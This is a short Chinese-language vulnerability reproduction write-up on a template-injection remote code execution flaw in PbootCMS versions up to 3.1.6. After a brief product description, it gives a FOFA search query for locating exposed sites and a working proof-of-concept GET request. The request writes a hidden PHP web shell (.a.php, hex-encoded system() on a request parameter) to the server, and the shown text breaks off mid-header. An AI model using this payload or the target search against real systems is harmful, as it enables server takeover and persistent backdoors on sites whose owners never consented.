PbootCMS 前台RCE漏洞复现

0x01 产品简介

PbootCMS是全新内核且永久开源免费的PHP企业网站开发建设管理系统，是一套高效、简洁、 强悍的可免费商用的PHP CMS源码，能够满足各类企业网站开发建设的需要

0x02 漏洞概述

PbootCMS v<=3.1.6版本中存在模板注入，攻击者可构造特定的链接利用该漏洞，执行任意代码，写入后门，获取服务器权限，进而控制整个web服务器。

0x03 复现环境

FOFA：app=”PbootCMS-PHP网站开发管理系统”

0x04 漏洞复现

PoC-1

GET /?member/login/aaaaaa}{pboot:if(true);use/**/function/**/fputs/**/as/**/test;use/**/function/**/fopen/**/as/**/test1;use/**/function/**/get/**/as/**/test3;use/**/function/**/hex2bin/**/as/**/test4;test(test1(test3('file'),'w'),test4(test3('content')));if(true)}{/pboot:if}&file=.a.php&content=3c3f7068702073797374656d28245f524551554553545b2761275d293b3f3e HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh;